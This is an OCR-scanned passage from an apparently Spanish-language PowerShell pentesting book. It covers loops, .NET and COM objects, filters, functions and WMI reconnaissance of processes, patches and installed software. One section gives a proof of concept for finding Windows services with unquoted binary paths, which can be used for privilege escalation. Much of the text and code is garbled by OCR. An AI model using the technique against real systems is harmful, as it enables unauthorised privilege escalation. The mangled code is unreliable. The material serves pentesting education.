El foreach, c puede Vers 1 C j ro ió H m I I 
: s l, et | uede verse en el lenguaje de programación CH, petr ite ir recorriendo un conjunto 
o listado de elementos u ob j tos. E á £ crt i i 
SU s. Es mé in emdlet que una instruc Te y is 
: nto )»bjeto S 1S L e t Sstruccio t 5 : > de r 
foreach-object. | 10n, ya que di: pone del emellet 


es . 
Sintaxis para utilizar este tipo de bucle es la siguiente: 
Para cada e | 

ara cada elemento en colección elementos 


Bloque de instrucciones 


N , 
Fin Para cada 


En el sigui : 
A^ el siguiente eje ; dei ; 
jemplo se puede visualizar como tras la ejecución de un listado de un directorio 


dado co 
n el bucle se puede i y nes 
cle se puede ir recorriendo los distintos elementos de la colección. 


Fot£ach (Selement ` 
i nen in Get-CnlldItem) 


ec me e 4 
cho "S (Selemento. Name v" 
Lo.Name) atributos: S(Selemento.At-ributes)" 
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Do-While 

Este bucle es especial ya que es postprobado, es decir, su condición de salida se comprueba una vez 
se ha ejecutado el bloque de instrucciones previo. En otras palabras este tipo de bucle se ejecuta 1 o 
N veces. La sintaxis del bucle en formato de pseudocódigo es la siguiente: 


Hacer 
Bloque de instrucciones 


Mientras que (condición) 


El funcionamiento es similar al del bucle while salvo que la evaluación de la condición se realiza tras 
la ejecución de las instrucciones, por lo que al menos éstas serán ejecutadas una vez. En el siguiente 
ejemplo se propone un menú, como el que se pudo estudiar en el caso del selector switch, para un | 


script. 


do 

1 
Write-Host *1) 
Write-Host "2) 
Write-Host "3) 
Write-Host "introduce opción: 

cion = Read-Eost 


Clear-H 


jwhile($opc 


While 


El bucle while se ejecutará 0, 1 o N veces. Es un bucle preprobado mediante una condición inicial 
o varias, cuando éstas dejan de cumplirse se sale del bucle. Este tipo de bucle es el más utilizado en 
los lenguajes de programación. Se suele utilizar cuando la condición es preprobada y no se conoce e 
nümero de iteraciones que se van a ejecutar. La sintaxis del bucle while es la que se puede visualizar 
en el siguiente pseudocódigo. 
Mientras que (condición) 

Bloque de instrucciones 


Fin Mientras que 


¿Cómo funciona el bucle? El funcionamiento del bucle es sencillo y se divide en los siguientes 
pasos: 

- Se evalúa la condición. 

- Sila condición es falsa se sale del bucle sin ejecutar instrucciones. 

- Sila condición es cierta se ejecuta el bloque de instrucciones. 


- Se vuelve a iterar evaluando la condición. 


En el siguiente ejemplo se implementa un contador mediante un bucle while. 
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cont -1t 10) 


Write-Host “iteración número 5($cont)” 
5contt* 


PoC: Encontrando servicios vulnerables 


En esta prueba de concepto se presenta la posibilidad de detectar rutas de binarios de servicios de 
Windows la cuales no se encuentran especificadas entre comillas. Esto presenta un problema y es que 
si una ruta no está entre comillas Windows ejecutará la primera ruta que se encuentra válida hasta el 
primer espacio, es decir, si se tiene la siguiente ruta C:\Program Files'pablo software binario.exe se 
ejecutaria C: 'Program.exe en el caso de existir. 


Dicho de otra manera, detectando esto un atacante puede aprovecharse de este hándicap para 
provocar una escalada de privilegios tras la ejecución de un binario creado para la ocasión. 


Más adelante en el libro se puede encontrar alguna prueba de concepto más, ya que esta técnica está 
implementada en frameworks de pentesting con PowerShell. En este apartado se presenta un seript 
que se apoya en la obtención de un listado de servicios que se ejecutan en la máquina y con un bucle 
foreach se van recorriendo. 


Por cada elemento que se recorre, los cuales son objetos con distintos atributos y propiedades que 
representan servicios en el sistema, se hacen una serie de comprobaciones. Lo importante en el caso 
de los servicios es la ruta dónde se encuentra el binario y para ello se utiliza el pathname por cada 
elemento recorrido. Se comprueba que el pathname no sea nulo, no sea vacio y que no comienza 
por comilla. 


Una vez que se comprueben estas cosas se comprueba que la ruta no sea Windows, y por último se 
muestra la información de los servicios cuyo binario no se encuentra en una ruta que comienza por 
comillas y que tienen la posibilidad de contener espacios en su ruta, por lo que serían potencialmente 
vulnerables. 


((!Selemento.pathname.Equals(""))-and(!Selemento.pathname. 
irtsWith("'""]j-and(Selementc.bpatnname -ñe $null]) 
Selem = $elemento.PaszhName.Splir(" ") [1 
i Selem.Conrains(":NWindows"))) 
selemento.FPathMNarme 
em .Name 
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EB . 


1 1 A TTG do y. 3 y co S "nr av dos 
En la imagen se puede visualizar la salida de la ejecución del script. Como se puede Pu mte S 
€ ae s 3 i 1 S. i y] e f Siwexe v 
rutas vulnerables, como son C:\Program Files (x86) Alcohol Soft Alcohol! 52:4xAuto MntSrv.exe y 
as Y [: 3. . 5 d ; « 
3 i 86) Alcohol SoftAl s2iStarWindStarWindServiceAE.exe. 
C: Program Files (x86)'Alcohol Sofr.Al: ohol 52:StarWind 


C oit s r worker. service.rb 
retasploit.ruby bin ruby.exe -C ait.apps:p ui vorker se 
metasplostworker A iei ec 
C APrOÉ am Fiies S&)Alcoho] SoftiAlcohol S2.5tarWind'StarwindServiceAr. exe 
€: ogr es (x ol So 


StarwindServiceAE 
32 


VBoxService. exe 


ryice 


Fig. 2.10: Obtención de pistas en binarios de serv icios sin comillas 


9. Creación de objetos .NET 


La linea de comandos de PowerShell permite utilizar componentes con c 
v COM. De este modo el usuario debe entender que no se limita al uso de emelle 


nterfaces . NET Framework 


New-Object | | MN 

El emdler New-Object permite crear objetos desde PowerShell. Este « madlei permite cllc 
de una clase de . NET. En el siguiente ejemplo se utiliza la clase mE en 
PowerShell v2. la ejecución sería la siguiente New-Object —Tvpe Svstem.Diagnostics.EventLog 3 


; E | 
IreumentList Application. 


i i i "uctor, yé > los ar ntos que se pasan como valores 
La ejecución anterior se denomina constructor, ya que los argumentos que se pasé 


son utilizados en un método especial. 


^ , T ; licati 
IPS CiNUisersspablo> New-Object -TypeNane Systen.Diagnostics.EventLog firgunentList fipplica 


Max<K) Retain Overfloufiction Entries Log 


28.488 20.979 Application 


8 OverwuritefisNeeded 


C:NUsersNpablo? 


Fig. 2.11: Creación de objeto 


a variable haciendo referencia à éste. 

El objeto creado anteriormente puede ser almacenado en una variable, haciendo re ferencia à 
à 11; ió > "T "uo ^ c - O. 

este modo el objeto puede ser utilizado durante la sesión O el script por el usuari 

i izaci i >e as ocasiones & 
PowerShell puede realizar gran cantidad de canalizaciones. aunque en an e oca -— 

: > 1 Y > p 3 > ^" 1 p r OS a 

interesante utilizar variables para almacenar objetos con el fin de poder manipula ap 


Meis 
con mayor facilidad. f 
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Creación de objetos COM 


Se puede utilizar el cmdlet New-Object para trabajar con los componentes COM. Estos componentes 
proporcionar desde diversas bibliotecas que son incluidas en Windows Script Host, WSH, hast: 
iplicaciones ActiveX, como por ejemplo el famoso navegador de Microsoft Internet Explorer. 


La mayoría de los objetos conocidos como WSH pueden crearse especificando lo que se denomina 
ProglID. Estos ProgID pueden ser WScript.Shell, WScript.Network, Scripting.Dictionary y Scripting 
FileSvstemObject. A continuación se enumeran los comandos que permiten a un usuario crear este 
tipo de objetos: 


- New-Object -ComObject WScript.Shell. 

- New-Object -ComObject WScript.Network. 

- New-Object -ComObject Scripting.Dictionary. 

- New-Object -ComObject Scripting.FileSystemObject. 


Para ejemplificar qué cosas se pueden llevar a cabo con este tipo de objetos se van a crear accesos 
directos con WScript.Shell. En este ejemplo se quiere crear un acceso directo, el cual vincule a 
una carpeta personal del usuario. En primer lugar se debe crear una referencia a WS ript.Shell y 
almacenarla en una variable, por ejemplo $wshshell = New-Object -ComObject WScript.Shell. Para 
poder evaluar los métodos y propiedades disponibles en este objeto se puede utilizar el cindlet Get- 
Member, por lo que si se ejecuta $wshshell | Ger-Member se obtendrán diferentes métodos que 
pueden ser lanzados por el usuario. 


"sNpablo» $ush = New-Object -ComObject WScript-Shell 
"sNpablo? $ush 


jec ia lFo lders 


CurrentDirectory 


*NUsers*Npablo 


xpablo> $ush | Get-Member 


IypeNane: System. | ConObjectilC41904480-be18-11d3—a28b-080104bd35898» 


MenberType 


ctivate 
Shortcut 


Method 
Method 
Method 
ndEnvironmentStrings Method 
ent Method 
Method 
Method 
Method 
Method 
Method 
Method 
ParameterizedProperty 
Property 
Property 


IDispatch CreateShortcut (string) 

IUshExec Exec string? 

string ExpandEnvironmentStrings (string?) 
bool LogEvent (Variant, string, string? 

int Popup “string, Variant, Variant, Variant) 
void RegDelete (string) 

Variant RegRead (string> 

void RegMrite (string, Variant, Variant) 
int Run (string, Variant, Variant> 

void SendKeys (string, Variant> 
IWshEnvironment Environment (Variant> get? 
string CurrentDirectory C) (get> {set} 
IWshCollection SpecialFolders (> (get? 


ment 
irectory 


\lFolderg 
Fig. 2.12: Creación de un objeto COM en Powershell. 


El método WScript.Shel 


a: : l.CreateShortcut acepta un argumento, el cual es la ruta del archivo de 
eeso directo que 


se quiere crear. Se puede utilizar una ruta de tipo absoluta, es decir, una ruta 
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l acceso directo. Para crear el acceso directo 


completa al directorio en el que se quiere crear e 
comandos de PowerShell $Ink = $wshshell, 


se ejecuta la siguiente instrucción sobre la línea de 
CreateShortcut("«ruta directorio>"). 


Filtros 

El emdlet Where-Object permite evitar que un objeto pase por una canalización si no cumple con 
abras, Where-Object probará cada objeto de la canalización y lo 
da condición. Lógicamente. los objetos que no superen 
bar por el emdlet se proporciona como 


la condición requerida. En otras pal 
pasará por ésta solo si cumple una determina 
la prueba se quitan de dicha canalización. La condición a pro 
el valor del parámetro Where-Object -FilterScript. 


En este apartado se va a mostrar un ejemplo sencillo de uso de FilterScript, pero ¿Qué es el 
FilterScript? Realmente es un bloque de script, es decir uno o más comandos de PowerShell que 
son especificados entre llaves. El parámetro FilterScript es evaluado a true o false. El bloque de 
script puede contener código muy sencillo, pero se debe tener claro algunos conceptos previos, 
Generalmente, el código del interior de un bloque de script serán operaciones de tipo comparación. 
El operador realizará una comparación entre los elementos que aparecen à ambos lados del operador, 
Los operadores de este tipo pueden visualizarse en la siguiente tabla de elementos: 


Tabla 2.06: Elementos de comparación para FilterScript 


Los bloques de script que utiliza el cmdlet Where-Object utilizan una variable especial, la cual es ji 


Esta variable hace referencia al objeto actual que se encuentra en la canalización. 

En el siguiente ejemplo se pasan diversos objetos al cmdlet Where-Object. los cuales son eval 
para comprobar si la longitud de dichos objetos es mayor de 5. La instrucción ejecutada e$ 
siguiente “pablo”, "sandra ", "natalia " | Where-Object [$ .length -gt 5}. Esta instrucción deset 
el nombre pablo por no cumplir con la condición de que su longitud sea mayor de 5. 
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Como se ha visto en el ejemplo anterior la variable especial $_ tiene acceso a las propiedades de lo 
¡hietos, y esto es rez útil, va que 5 suario ai e > 
objetos de es realmente ütil, ya que permite al usuario aprovecharse de todo el potencial que 
aportan los objetos. Imaginando un sistema Windows y utilizando la clase Win32 SystemDriver de 
— Aa f "ar > " m - £ s i — sd . 
I MI se puede filtrar por las propiedades de ésta el contenido que se quiere visualizar 


Como ejemplo se presenta la siguiente instrucción Get-WmiObject -Class Win32 SystemDrivei 
'here- ec 7 «Crpj è Tm > "T ^. P» T uon : " er 
x vtta h peda {$_ State -eq "Running "]. Previamente para poder visualizar los 
métodos y propiedades de los objetos se podía ejecutar G 'miObj 7 dm 
j ] et-WmiObject -Class Win32 SystemDriver 
Ger-Member. i À 32 SystemDrive: 


La lista que puede ser visualizada con las órdenes anteriores puede aün seguir siendo muy lare: 

Puede ser ütil concatenar condiciones, por ejemplo, de la siguiente manera Get-Win ¡Obj : Class 
Win32 SystemDriver | Where-Object —FilterScript /$ .State —eq "Running "] lere ibn 
FilterScript (S_.StartMode -eq "Auto "]. o yo 


Where-Object — 


Ahora se pueden utilizar cmdlers que den formato a la salida y concatenarlos al final de la instrucció 

ejecutada anteriormente. Como se puede visualizar es realmente utilizar filtros "- Án 
encontrar la información que el usuario necesita en cada instante. Se puede evitar utili ar e — s 
los emdlets Where-Object si se utiliza un operador lógico —and en este caso — 


El ejemplo anterior quedaría de la siguiente manera Get-WmiObject -Class Win32 SystemDrivei 

here eri —bBilterSerr m . m 3 A aa er 
Where-Object —FilterScript (($_.State eg “Running”) -and ($ .StartMode—eq "Auto ")] 
is 4 J- 


:üserzNpablo? Get-UniObjoct -Class Win32 
tarthodo ME D A Ad 


stenDriver | Where-Object -FilterScript (($ .State -eq “Running'> -and € 
= -and 


isplayMane : Link-Layer LIOS MES. x 
wine A A EE 
: Running 


: OK 


: Virtualización de archivos UAC 
: luafu : 
: Running 

OK 


: True 


e : MetGroup Packet Filter Driver 


: PEAUTH 
PERUTH 


Fig. 2.13: Utilización de filtros de objetos con Powershell. 


10. Utilización de clases y métodos de .NET 


No todas las elas ; 3 

è tange m = ^ a oni se pueden crear con el emdlet New-Object. En algunos casos 

iaiicando pai ^ feos pea se obtendrá un mensaje de error desde la línea de comandos 

errores? Se producen dcl, ntrado el constructor adecuado para ese tipo. ¿Por qué se producen estos 
n debido a que no hay una manera de crear un objeto a partir de dichas clases 
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KB 


que quieren ser utilizadas. Estas clases son bibliotecas de referencia de métodos y propiedades que 


no cambiarán de estado. En otras palabras, solo se tendrán que utilizar sin más. 


A continuación se muestra un ejemplo de cómo utilizar las clases y los métodos de éstas. Para hacer 
referencia a una clase estática, por ejemplo System.Environment, se debe especificar el nombre de 
la clase entre corchetes. En otras palabras se puede escribir en PowerShell [System.Environment] 
y se obtendrá información general sobre el tipo que se está tratando. Como nota extra indicar que 
también se puede omitir la palabra System invocando [Environment] directamente. 


¿Qué hace System. Environment? Esta clase estática contiene información sobre el entorno de trabajo 
del proceso actual, el cual es PowerShell.exe cuando se trabaja en la línea de comandos de Microsoft 


Para poder visualizar los métodos estáticos de la clase se puede utilizar el emdlet Get- Member como 
se hacía con los objetos anteriormente. Por ejemplo, si se quiere obtener los métodos estáticos se 
ejecuta [Svstem.Environment] | Get-Member —Static. 


IPS C:NUsersNpablo? [ISuysten. Environment 1 1 Get-Menber -Static 


TypeName: System. Environment 


MomberType Definition 


bool Equals<S 


Method 
Method 
xpandEnvironnentUariables Method 
FailFast Method 
BetConnandLinefir Method 
tEnvironmentVariable Method 
tEnvironmentVariables Method 
tFolderPath Method 
tLogicalDriv Method 
ReferencoEqual Method 
SetEnvironnentVariable Method 
onnandLine Property 
urrentDirectory Property 5 ring C Y 
IExitCode Property Y Int32 Exit 
asShutdounStarted Property ¿Boolean HazShutdow 
achineNane Property «String MachineNane £get;? 
i Property „String NewL 
Property .OperatingS 
Property .1nt32 Proc 
Property String StackTrace €get;? 
Property g SystenDirector (get;)> 
Property .Int32 TickCount (get; 
Property serDonainNane (get;? 
Property rinteractiue (get; 
Property 
Property 
Property 


ten.Object objfl. System.Object objB> 
System.Void Cint exitCode? 
ng Expan nuironnentÜariables(string name? 
en.Void FailFast( i age? 


ringil GetConnandLinefi 
stat ic string 


en.Collections. iables<), stat 


ring GetFolderPath(S 
ingl] GetLogicalDri [o7 
ol ReferenceEquals(Sys en.Object objA. System.Object objB? 
i nui le(string variable, string value), z 


ystemDirectory 
dekCount 
serDonainNane 
serinteractiue 


».Uersion U 
Systen.Int64 Worki 


Fig. 2.14: Obtención de métodos esiáticos en clases de NET Framework. 


Para poder listar las propiedades de la clase estática se puede utilizar la siguiente instrucción /Sysfet 
Environment] | Get-Member - MemberType Property. De nuevo es fundamental el uso del cmd 


Get-Member para poder listar las propiedades de la clase. 


Para poder leer el valor de las propiedades se utiliza *:: para indicar a PowerShell que se quiere utiliz 
una propiedad o un método estático. Por ejemplo. si se quiere acceder al usuario que ha lanza 
el proceso de PowerShell se puede ejecutar [System.Environment]:: UserName, tal y como P 
visualizarse en la imagen. Otros ejemplos interesantes es la utilización de la propiedad OS Versió 
la cual indica qué versión de Windows se está ejecutando, o la propiedad HasShutdownStart 
cual indica si el equipo se está apagando. Existen multitud de métodos y propiedades en esta cl 
extrapolando esto al uso de otras clases estáticas de . VET se puede dilucidar un gran potencial 

el scripting en PowerShell. 
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S CiNUsersispablo> [Sus i 

FS C: S ystem.Environment1::Co i 

ES: E cade PowerShe 11*v1 RENE IT. exe" 
Pc SNE o ystem.Environment ]::UserInteractive 


PS CiWsersipablo> [System.Environment ]::UserDomainName 


Ipablo-un 
S C:NUsersNpablo?» [System.Environnment]::UserName 


S C:Wsers\pablo> 


f 2 & T] . rfp , ^ 
Fig. 2.15: Lectura de propiedades estáticas de clases .NET Framework 


Otra clase estática interesante es System.Math, la cual permite realizar algunas operaciones 
matemáticas complejas. Se puede utilizar el cmdlet Get-Member de nuevo para abiener mita 
acerca de qué cosas se pueden realizar con la clase. Es realmente interesante profundizar pias 
tema, ya que como se mencionaba anteriormente, abre un nuevo mundo de posibilidi - eL 
scripting en PowerShell. de ades para el 


11. Funciones 


Una función es unà secuencia de código aislada que realiza una o varias acciones para devol 

POT ARD v usw " í eiie. » para devolver un 
valor. Pueden recibir parámetros de entrada para trabajar con estos valores y son muy útiles p 
` izar CÓ dá a o . El i > US y uy útiles para 
reutilizar código. de este modo se evita no tener que escribir código repetido en distintas part : lel 


desarrollo. Las funciones pueden ser invocadas desde cualquier punto de un scrip 
He c CU. 


El provider de las funciones 


El proveedor de las funciones es un almacén dónde 


À se puede navegar y realizar operaci 

: ! cites n gar y realizar operaciones sobre 

: distintas funciones en el entorno de PowerShell. Para trabajar sobre este prove dor 

a orden cd functi e de j -los iten Mods i 
cd function: y se pueden utilizar los emelet que permiten navegar entre director ri 

realizar acciones sobre el almacén. M m 


lindows PowerShell 
opyright <C) 2889 Microsoft Corporation. Reservados 


r 


derechos. 


la bit 
C: 


PC\pablo bienvenido a Pow 

t-PCNpab ien erShe11 

Y. Use Nbit 02/28/2612 10:21:11 > cd function: 
inction:\ 02/28/2812 10:21:16 > dir : 


nandT ype Name 


CIEN beet t Definition 

t E ^ 

tion - Set-Location 

t4: Set-Location 

s Uu " 

tion Set-Location 
Set-Location 
Set-Location * 


us y Nn. 
Fig. 2.16: Listado del proveedor de funciones 


Crear funciones 


En la lí 
y inca de com: ! 
comandos de PowerShell las funciones están definid 


Continuación se as por diversos elementos. A 


enumer: s diferentes i 
weran los diferentes elementos que definen una función: 


Pentesting con PowerShell 


EN. — 1  .——— —Éeneer m 


- Palabra reservada function. 
- Nombre de la función. 


- Ambito de la función, aunque este elemento es opcional. 


- Argumentos que son pasados a la función. Se pueden pasar desde O hasta N argumentos, 


aunque también son un elemento opcional. 
- Bloque de instrucciones. Este bloque es ejecut 
- Parámetros a devolver. La función puede devolver o no un resultado. 


ado cada vez que se invoca la función. 


A continuación se muestra el pseudocódigo que se utiliza para definir las funciones. La sintaxis es | 


sencilla. | 
Función [Ámbito] nombre de la función [(lista argumentos)] 


Bloque de instrucciones 


Fin Función 


a cual no recibirá ningün argumento y ejecutará 
hivos que se encuentran en 
alquier punto del script 


Un ejemplo básico es la creación de una función | 
un listado sobre el directorio actual y mostrará los atributos de los arc 
dicho directorio. Para ejecutar la función basta con escribir su nombre en cu 


o la shell. 


function 113: 
«$ (5Selemento.attributes) 


Para observar el contenido de las funciones, es decir, su código, se puede utilizar el emdlet get- 


content sobre el almacén de las funciones. 


swbit 62/28/2012 18: 51 > cd function: 
on:«. 02/28/2812 18:48 > Get-Content 11 


foreach “$elemento in Get-Childltem? 
M 

echo "$ lemento.name? atributos: 'elenento.attributes)' 

PS Function: 02/28/2012 19:48:58 > üu 

Fig. 2.17: Captura de código de una función implementada. 

s a una función se pueden utilizar dos formas disti 


La primera de las formas es mediante argumentos, mientras que la segunda es mediante e] uso 


parámetros. La diferencia radica en que, por ejemplo, la posición del argumento en el paso de 


a la función sí importa, mientras que en el caso de los parámetros esto no ocurre, ya que el valor 


acompañado del nombre del parámetro, por lo que su posición no aporta significado. 


Cuando el usuario necesite pasar valore 


so de valores a funciones mediante el uso de argum 


La primera manera que se estudia es el pa 
intuitivo y sencillo Nombre de la función argu 


Su sintaxis, como puede visualizarse, €s 
argumento2 ... argumento N. 
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» el ejemplo se mejora la función a ; 
Para y ] e mejora la función anterior, la cual ahora recibirá un argumento que será 
directorio sobre el que hacer el listado con los atributos " o que será el 


unction listarAtributos 


47 


cho “S (Selemento. name) 


atributos:S(Selemento.attribute 


PE 
$35 


a vint et es : uso de los parámetros. Cómo se ha comentado anteriormente, el orden 
gu E, es 
indi Hane E ahud e parámetros, por lo que ofrece una ventaja frente al uso de argumentos. La 
sintaxis es a in icada a continuación Nombre de la función “Parámetro 1 <valor parámetr. > 
-Parámetro N <valor parámetro>. — 


. » Si Li ie i c H d e tr . 

En el siguiente ejemplo. se modifica la función anterior para disponer de un parámetro qu 
"m q 7 - > yo mak R A R E e sea e 

directorio sobre el que listar y un parámetro que indicará si obtener los atributos o no — 


n listarAtributos 


páram([String]Sdi 
each (Selemento ) 
y 
f(Smostrar-ea'si' 
ec “5 (felemento z t 
$S(S5eiementc.name) atributos:S(Selemento.arttributes)" 
(Selemento.name)” 
LL ri 
Vbit " bs k Ls 
PM À sta butos -directorio c: -mostra S 
s\bi starAtributos -mostrar no lirectorio m 


Con par 5 j S el 
anm se defin > ará tros S i iz À y y ) S se 
en los paramet OS que se utili raran en la función / como uede vi sualiz ay 
s à sualizarst 


liene un potenci 
encial enorme. Se indicar si 
. Se puede indicar s E ʻO es de us i i 
nc p ¡car si el parámetro es de uso obligatorio o no con la cláusula 


Además 5, Se ili » ~ f > e co ^" > 
y 3 utilizar pará "OS a i ) i ) ) ) I E 
€ arametros con tip o de inido, cor lc que se asegura el uso correcto d t 
QC CSLOS 


parámetros pr Yy a a ge p 
* € 'ocando error si i i € s ) 
Or SI el tipo que se pasa a la función no es co mpatible 


La devolución de valores 


; por parte de cri i PERPE 
en una variable | un script se realiza de manera implicita y puede ser recogida 


para su tratamie steri 
nto post 
ras posterior. 


esultado 


listarAtributos -directorio c:l -mostrar si 


e" Cilsersibit>s; 


resultado 


[771 Pentesting con PowerShell 


12. Administración y recopilación de información 


El usuario puede realizar un control administrativo sencillo de los sistemas de forma interactiva o a 
través del uso del scripting. La administración en sistemas Windows está totalmente implementada 
gracias al uso de la línea de comandos de PowerShell, la cual ofrece un gran número de emdlets 
y opciones a través de otras tecnologías como, por ejemplo, el lenguaje de instrumentación WMI. 


Como se ha podido estudiar en el capítulo PowerShell no se basa solo en cmdlets y utiliza otras 
tecnologías para poder resolver todas las necesidades de usuarios, administradores y por extensión 
de los pentesters. A continuación se van a estudiar una serie de ejemplos de administración básica | 
que puede ayudar a recopilar información del sistema y gestionarla. 


La administración de procesos y servicios locales es algo básico y fundamental para controlar lo 
que se está ejecutando o se ejecutará en el sistema. Se puede realizar una inspección o filtración de | 
procesos y servicios utilizando los siguientes emdlets: 


Devuelve un listado de los procesos que se ejecutan en la máquina. Es 
posible utilizar ciertos parámetros como Td para especificar el número del 
PID que se quiere filtrar. Por supuesto se puede utilizar el emalet Where- 
Object para filtrar en función de una o varias condiciones. Por ejemplo, 
Get-Process | Where-Object 18$_.pid -gt 2000) 


Get-Process 


Este cmdlet permite detener un proceso del sistema, el cual se puede 
especificar a través del parámetro -Name o -[d. Como ejemplo se muestra 
la parada de procesos que no están respondiendo Get-Process | Where- 

Object —FilterScript [$ Responding —eq Sfalse] | Stop-Process 


Stop-Process 


Permite listar los servicios que hay en el sistema, pudiendo filtrar el estado 
en el que se encuentra, por nombre, etcétera. Por ejemplo, para visualizar 
los servicios que se encuentran ejecutándose en el sistema se puede 
lanzar la siguiente instrucción Get-Service | Where-Object |$ .status -eq 
"Running "] 
Con este cmdlet se puede cambiar el estado de un servicio de running à 
stop 


Get-Service 


Stop-Service 


Start-Service Permite arrancar un servicio que se encuentra detenido 


Permite detener un servicio y volverlo a arrancar, todo ello a través de un 
cmdlet. Como ejemplo se muestra el listado de servicios que son filtrados 
por servicios que pueden ser detenidos y se lleva a cabo el reinicio. Get- 
Service | Where-Object -FilterScript /8_. CanStop] | Restart-Service 


Restart-Service 


Suspend-Service 


Permite suspender un servicio 


Tabla 2.07: Comandos para tratamiento de procesos y servicios, 
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Para recopilar información acerca de los sistemas dónde el penrester se encuentra se puede utilizar 
un emdler muy útil como es Get-WmiObject. Este emdlet puede acceder a toda la configuración 
fundamental de los subsistemas que son expuestos mediante el lenguaje de instrumentación WMI. 
Con este lenguaje se pueden realizar tareas avanzadas con poco esfuerzo. 


A continuación se muestran diversos ejemplos de recopilación de información que pueden resultar 
muy útiles en el momento de realizar un script. Estas instrucciones pueden ser utilizadas por un 
pentester durante las primeras fases de un test de intrusión. 


La clase Win32 BIOS de WMI permite recolectar 
información completa sobre la BIOS del sistema. 


La clase Win32 Processor de WMI permite recolectar 
información general de los procesadores. Es altamente 
probable que se quiera filtrar entre toda la información 
que reporta esta instrucción, por lo que se puede utilizar 
Select-Object para ello, por ejemplo Get- WmiObject 
-Class Win32 Processor -ComputerName . | Select-Object 
-Property [az]* 


Get-WmiObject -Class Win32_ 
BIOS -ComputerName . 


Get-WmiObject -Class Win32 
Processor -ComputerName . 


La clase Win32 ComputerSystem de WMI permite 
obtener información del modelo del equipo. Se pueden 
conseguir datos como el dominio, el nombre de máquina, 
manufacturer o el propietario 


Get-WmiObjeet -Class Win32 
ComputerSystem 


La clase Win32 QuickFixEngineering de WMI permite 
obtener todas las revisiones instaladas. Esto puede 
ser realmente útil para que el pentester conozca que 
parches hay instalados en la máquina. Puede resultar 
interesante filtrar por alguna propiedad como es AotFix/D 
Get-WmiObject -Class Win32 QuickFixEngineering 
-ComputerName . -Property HotFixld 


Get-WmiObject -Class 
Win32 QuickFixEngineering 
-ComputerName . 


La clase Win32 OperatingSystem de WMI permite 
recopilar información sobre la versión del sistema 
operativo y los Service Pack instalados. Para poder 
listar los usuarios y propietarios locales se puede 
utilizar la instrucción Ger-WmiObject -Class Win32 
OperatingSystem -ComputerName . | Select-Object 
-Property NumberOfLicensedUsers, NumberOfUsers, 
RegisteredUser 


Get-WmiObject -Class Win32 | 
OperatingSystem -ComputerName . 


Get- WmiObject -Class Win32_ 
LogicalDisk -Filter "DriveType-3" 
-ComputerName . 


La clase Win32 LogicalDisk de WMI permite recopilar 
información sobre el espacio en disco disponible 
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Descripción 
La clase Win32 LogonSession de WMI permite obtener 
información sobre las sesiones indiciadas asociadas a 


Instrucción 


Get-WmiObject -Class Win32. 
LogonSession -ComputerName . 


usuarios 


Tabla 2.08: Recopilando información con Ger-WmiObject 


Recopilando información sobre el software de la máquina 


El usuario puede tener acceso a información sobre el software de la máquina, por ejemplo a través del 
uso de la clase Win32 Product de WMI. Con el uso de esta clase se pueden gestionar las aplicaciones 
instaladas con Windows Installer. tanto en un sistema local como remoto. 


Ejecutando la instrucción Get-WmiObject —Class Win32 Product -ComputerName . se puede 
obtener un listado de aplicaciones instaladas con Windows Installer. Se puede obtener información 
como el nombre de la aplicación, la versión, el vendor, etcétera. Los cmdlets Select-Object y Where- 
Object pueden ayudar al usuario a filtrar las propiedades que se necesiten. 


S C:NUsersNpablo? Get Nmi0bject -Class Win32 Product —ComputerName 


£D5F3BBEC-A8DA—-4E65-—B74F-A4132D61DDB4D> 
FOCA Free 

Informatica64 

SAA 

FOCA Free 


£95120000-B0B9-B0489-19900-B0BBBBBFFICE> 
Microsoft Application Error Reporting 
Microsoft Corporation 

12.0.6015.5008 


IdentifyingNumber 


Version 
Caption 


IdentifyingNumber 


Microsoft Application Error Reporting 


£981 499988011 —BBBB—1B00-ABBBBABFF1CE> 
Microsoft Office Professional Plus 2018 
Microsoft Corporation 

14.0.4763.1000 

Microsoft Office Professional Plus 2818 


£98149909-B04A1—-0CBA-1000-BOBABBBFF1CE> 
Microsoft Office OneNote MUI <Spanish> 2818 
Microsoft Corporation 

14.M.4763.1000 

Microsoft Office OneNote MUI «Spanish? 2818 


IdentifyingNumber 
Name 

Vendor 

Version 

Caption 


IdentifyingNumber 


Fig. 2.18: Obtención de aplicaciones instaladas con Windows Installer. 


¿Cómo visualizar qué aplicaciones pueden ser desinstaladas? No se puede garantizar de que se 
puedan encontrar todas las aplicaciones del sistema, se puede buscar todos los programas que 
aparecen en agregar o quitar programas. Esta característica de Windows busca estas aplicaciones en 
las listas que se encuentran en la clave del registro KEY LOCAL MACHINE Software Microsoff 
WindowsCurrentVersion' Uninstall. Se puede visualizar los identificadores a través de las claves 
de registro con la instrucción ls HKLM: SOFTWARE Microsoft: Windows ¡Current Version Uninstall 


— ES 


Para listar el nombre de las aplicaciones que pueden ser desinstaladas se puede ejecutar la siguiente 
instrucción ls HKLM: SOFTWARE Microsoft Windows! CurrentVersion Uninstall | ForEach-Object 
.Process { $_.GetValue(*"DisplavName”)). Con el cmdlet ForEach-Object se puede ir evaluando 
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cada objeto, los cuales representan las claves del registro dónde se encuentran los uninstall de las 


aplicaciones instaladas, y mostrando el nombre de la aplicación. 


ps. C: MUsers pablo» 1s HKLM:NSOFTURRENMMicrosoftNUindousNCurrentUersionNUninstall | 
"DisplayNane"5 > 
a Product Library 
icrosoft Office Professional Plus 28109 
Oracle UM VirtualBox Guest Additions 4.3.28 
WinRAR 4.28 €64-bit) 
Microsoft -NET Framework 4.5 
icrosoft Visual C++ 2010 x64 Redistributable — 10.M.40219 
Hindows Software Development Kit for lindows Store Apps DirectX x64 Remote 
icrosoft Visual C++ 2812 x64 Debug Runtime — 11.8.50727 
Crystal Reports Basic Runtime for Visual Studio 2808 (x64) 
Microsoft SQL Server 2812 Data-Tier App Framework 
Uindovs Software Development Kit DirectX x64 Remote 
Microsoft SQL Server 2612 Express LocalDB 
icrosoft SQL Server 2812 Transact-SQL ScriptDom 
icrosoft Visual Studio Team Foundation Server 2012 Object Model 
icrosoft SQL Server 2012 Transact-SQL Compiler Service 
icrosoft Silverlight 
icrosoft Office Professional Plus 2018 
icrosoft Office Access MUI <Spanish> 2018 
Microsoft Office Excel MUI <Spanish> 28018 
icrosoft Office PowerPoint MUI <Spanish> 20190 
icrosoft Office Publisher MUI <Spanish)> 2018 
icrosoft Office Outlook MUI «Spanish? 2018 


Fig. 2.19: Nombres de las aplicaciones con los desinstaladores de Windows Install. 


La clase Win32 Product permite instalar aplicaciones a través de Windows Installer. Si se requiere 
una instalación remota se debe especificar la ruta de acceso al paquete .msí para la instalación a 
